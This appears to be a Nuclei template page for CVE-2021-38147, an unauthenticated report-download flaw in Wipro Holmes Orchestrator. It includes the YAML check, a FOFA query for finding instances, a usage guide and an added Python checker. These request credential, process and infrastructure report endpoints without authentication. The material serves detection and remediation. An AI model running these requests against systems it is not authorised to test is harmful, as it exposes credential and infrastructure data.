Wipro Holmes Orchestrator 20.4.1 - Information Disclosure
ID: CVE-2021-38147
Severity: high
Author: s4e-io
Tags: cve,cve2021,wipro,holmes,orchestrator
Description
Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel. The weakness is a missing authentication check on these report-export endpoints (CWE-306), so anyone who can reach the web interface can pull the exports, including the domain credential report.
YAML Source
id: CVE-2021-38147

info:
  name: Wipro Holmes Orchestrator 20.4.1 - Information Disclosure
  author: s4e-io
  severity: high
  description: |
    Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel.
  remediation: |
    Fixed In v21.4.0
  reference:
    - https://packetstormsecurity.com/files/165039/Wipro-Holmes-Orchestrator-20.4.1-Report-Disclosure.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-38147
    - https://www.wipro.com/holmes/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-38147
    cwe-id: CWE-306
    epss-score: 0.00497
    epss-percentile: 0.76242
    cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: wipro
    product: holmes
    fofa-query: title="Holmes Orchestrator"
  tags: cve,cve2021,wipro,holmes,orchestrator

http:
  - method: GET
    path:
      - "{{BaseURL}}/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel"
      - "{{BaseURL}}/processexecution/DownloadExcelFile/Process_Report_Excel"
      - "{{BaseURL}}/processexecution/DownloadExcelFile/Infrastructure_Report_Excel"
      - "{{BaseURL}}/processexecution/DownloadExcelFile/Resolver_Report_Excel"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "contains_all(header, 'application/vnd.openxml', 'attachment; filename=')"
          - "contains(body, '<?xml version=')"
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100832cd551eccb17f8e9bda235842e2bff517f627daaa977461ce19483647f6762022100d9272507353f23c0ca4343fbd2764db9fe75e068bcc74eaa967306e6dfb3c023:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This Nuclei template checks for CVE-2021-38147 by sending unauthenticated GET requests to four of the five report endpoints named in the description (User_Report_Excel is not requested) and stopping at the first one that answers 200 with an Excel content type, an attachment Content-Disposition header and an XML body. Point it at the base URL of the Holmes Orchestrator instance, with no credentials configured:

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-38147.yaml"

A match means the report was actually served to an unauthenticated client, so the response body may contain the credential data that report exports; handle the scan output accordingly. Per the template, the issue is fixed in v21.4.0; after upgrading, rerun the template to confirm that none of the endpoints still match.
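The template's DSL matcher can be reproduced outside Nuclei, which is useful for confirming a finding by hand or for checking a patched instance without downloading whole reports. The script below is an added example, not code from the Nuclei template or from Wipro; it re-implements the three matcher conditions, keeps only a bounded prefix of each response body (so a credential report is never written to disk), and includes constructed sample responses so the matcher logic can be checked offline. The endpoint paths come from the CVE description; everything else (function names, the BODY_LIMIT value, the sample responses) is an assumption made for this example.

```python
"""Stand-alone checker for CVE-2021-38147 (unauthenticated report download).

Added example: not the Nuclei template's code and not Wipro's. It mirrors the
template's matcher so a result can be verified offline, and adds a live fetch
that reads only a bounded body prefix.
"""
import sys
import urllib.error
import urllib.request
from dataclasses import dataclass, field
from typing import Dict, Optional

# The five endpoints named in the CVE description. The Nuclei template
# requests four of them; User_Report_Excel is added here for completeness.
REPORT_PATHS = (
    "/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel",
    "/processexecution/DownloadExcelFile/User_Report_Excel",
    "/processexecution/DownloadExcelFile/Process_Report_Excel",
    "/processexecution/DownloadExcelFile/Infrastructure_Report_Excel",
    "/processexecution/DownloadExcelFile/Resolver_Report_Excel",
)

BODY_LIMIT = 64 * 1024  # assumed cap: enough for the '<?xml version=' check


@dataclass
class Response:
    status: int
    headers: Dict[str, str] = field(default_factory=dict)  # name -> value
    body: bytes = b""


def matches_template(resp: Response) -> bool:
    """Mirror of the template's DSL matcher with condition: and.

    contains_all(header, 'application/vnd.openxml', 'attachment; filename=')
    contains(body, '<?xml version=')
    status_code == 200
    Nuclei's `header` variable is the raw header block, so the headers are
    joined back into one string before the substring checks (lower-cased here
    so header-name casing does not matter).
    """
    if resp.status != 200:
        return False
    raw_headers = "\n".join(f"{k}: {v}" for k, v in resp.headers.items()).lower()
    needles = ("application/vnd.openxml", "attachment; filename=")
    if not all(n in raw_headers for n in needles):
        return False
    return b"<?xml version=" in resp.body


def fetch(url: str, timeout: float = 10.0) -> Optional[Response]:
    """GET with no cookie or auth header; None if the host does not answer."""
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2021-38147-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as r:
            return Response(r.status, dict(r.headers.items()), r.read(BODY_LIMIT))
    except urllib.error.HTTPError as e:  # 401/403/404/500 still carry a status
        return Response(e.code, dict(e.headers.items()), e.read(BODY_LIMIT))
    except OSError:  # URLError, timeouts and socket errors are all OSError
        return None


def scan(base_url: str) -> Dict[str, Optional[bool]]:
    """Map each endpoint to True (served without auth), False, or None (no reply)."""
    base = base_url.rstrip("/")
    results: Dict[str, Optional[bool]] = {}
    for path in REPORT_PATHS:
        resp = fetch(base + path)
        results[path] = None if resp is None else matches_template(resp)
    return results


# Constructed sample responses (not captured from a real instance) covering the
# cases a tester sees: an exported report, a login page, an auth error, and a
# binary .xlsx, which the template's body check does not match.
XLSX_HEADERS = {
    "Content-Type": "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet",
    "Content-Disposition": 'attachment; filename="Domain_Credential_Report.xlsx"',
}
SAMPLE_RESPONSES = {
    "xml_report": Response(200, XLSX_HEADERS, b'<?xml version="1.0"?><Workbook/>'),
    "login_page": Response(200, {"Content-Type": "text/html"}, b"<html>login</html>"),
    "unauthorized": Response(401, {"Content-Type": "application/json"}, b'{"e":1}'),
    "zip_xlsx": Response(200, XLSX_HEADERS, b"PK\x03\x04" + b"\x00" * 16),
}


def self_check() -> Dict[str, bool]:
    """Run the matcher over the constructed samples; only xml_report matches."""
    return {name: matches_template(r) for name, r in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8080"
    for path, hit in scan(target).items():
        label = "VULNERABLE" if hit else ("no match" if hit is False else "no response")
        print(f"{label:12} {path}")
```

Two behaviours differ slightly from Nuclei and are worth knowing about: urllib follows redirects, so an endpoint that bounces to the login page ends up as a 200 HTML response, which the header check rejects as intended; and the body check, like the template's, only fires on an XML-formatted export, so a server that returns a genuine zipped .xlsx (body starting with PK) would need the body condition relaxed.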